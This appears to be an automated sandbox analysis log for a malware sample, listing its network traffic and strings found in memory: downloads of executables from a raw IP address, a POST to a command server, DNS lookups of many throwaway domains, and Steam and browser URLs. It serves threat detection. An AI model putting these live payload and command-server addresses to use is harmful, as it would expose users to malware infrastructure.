Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: s31ydU1MpQ.exe, 00000000.00000003.1296626489.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queni equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=6b6aee782ee003749cc6841d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:28:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control/Y< equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr2G equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1565724088.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe4
Source: s31ydU1MpQ.exe, 00000000.00000003.1564793183.0000000001311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeKl
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe1
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeh
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/zKH
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001082000.00000004.00000020.00020000.00000000.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/urrentVersion
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowBG
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=e
